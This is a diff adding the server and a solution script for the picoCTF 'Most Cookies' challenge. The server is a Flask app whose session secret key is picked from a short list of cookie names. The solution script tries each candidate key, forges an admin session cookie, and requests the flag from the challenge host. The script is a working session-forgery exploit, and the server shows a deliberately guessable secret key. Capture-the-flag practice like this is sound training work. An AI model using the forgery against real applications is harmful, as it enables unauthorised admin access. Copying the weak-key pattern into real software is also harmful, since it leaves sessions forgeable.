most cookies

most_cookies/server.py

@@ -0,0 +1,58 @@
+from flask import Flask, render_template, request, url_for, redirect, make_response, flash, session
+import random
+app = Flask(__name__)
+flag_value = open("./flag").read().rstrip()
+title = "Most Cookies"
+cookie_names = ["snickerdoodle", "chocolate chip", "oatmeal raisin", "gingersnap", "shortbread", "peanut butter", "whoopie pie", "sugar", "molasses", "kiss", "biscotti", "butter", "spritz", "snowball", "drop", "thumbprint", "pinwheel", "wafer", "macaroon", "fortune", "crinkle", "icebox", "gingerbread", "tassie", "lebkuchen", "macaron", "black and white", "white chocolate macadamia"]
+app.secret_key = random.choice(cookie_names)
+
+@app.route("/")
+def main():
+	if session.get("very_auth"):
+		check = session["very_auth"]
+		if check == "blank":
+			return render_template("index.html", title=title)
+		else:
+			return make_response(redirect("/display"))
+	else:
+		resp = make_response(redirect("/"))
+		session["very_auth"] = "blank"
+		return resp
+
+@app.route("/search", methods=["GET", "POST"])
+def search():
+	if "name" in request.form and request.form["name"] in cookie_names:
+		resp = make_response(redirect("/display"))
+		session["very_auth"] = request.form["name"]
+		return resp
+	else:
+		message = "That doesn't appear to be a valid cookie."
+		category = "danger"
+		flash(message, category)
+		resp = make_response(redirect("/"))
+		session["very_auth"] = "blank"
+		return resp
+
+@app.route("/reset")
+def reset():
+	resp = make_response(redirect("/"))
+	session.pop("very_auth", None)
+	return resp
+
+@app.route("/display", methods=["GET"])
+def flag():
+	if session.get("very_auth"):
+		check = session["very_auth"]
+		if check == "admin":
+			resp = make_response(render_template("flag.html", value=flag_value, title=title))
+			return resp
+		flash("That is a cookie! Not very special though...", "success")
+		return render_template("not-flag.html", title=title, cookie_name=session["very_auth"])
+	else:
+		resp = make_response(redirect("/"))
+		session["very_auth"] = "blank"
+		return resp
+
+if __name__ == "__main__":
+	app.run()
+

most_cookies/sol.py

@@ -0,0 +1,22 @@
+#!/home/maxime/.pyvenv/bin/python3
+from tqdm import tqdm
+import requests
+import hashlib
+from itsdangerous import URLSafeTimedSerializer, Signer
+
+key_list = ["snickerdoodle", "chocolate chip", "oatmeal raisin", "gingersnap", "shortbread", "peanut butter", "whoopie pie", "sugar", "molasses", "kiss", "biscotti", "butter", "spritz", "snowball", "drop", "thumbprint", "pinwheel", "wafer", "macaroon", "fortune", "crinkle", "icebox", "gingerbread", "tassie", "lebkuchen", "macaron", "black and white", "white chocolate macadamia"]
+
+cookie_given_b64 = "eyJ2ZXJ5X2F1dGgiOiJibGFuayJ9.Zmr-Hg.EZmO2K5if1NGsQEXrC2ii1PhJmE"
+cookie_base_value = {"very_auth":"admin"}
+
+for key in tqdm(key_list):
+    cookie_signature = URLSafeTimedSerializer(key, salt="cookie-session", signer_kwargs={"key_derivation": "hmac", "digest_method": hashlib.sha1}).dumps(cookie_base_value)
+    tqdm.write(cookie_signature)
+    cookie = {"session": cookie_signature}
+    r = requests.get("http://mercury.picoctf.net:53700/display", cookies=cookie, allow_redirects=False)
+    if "picoCTF{" in r.text:
+        for line in r.text.splitlines():
+            if "picoCTF{" in line:
+                tqdm.write(line)
+                exit()
+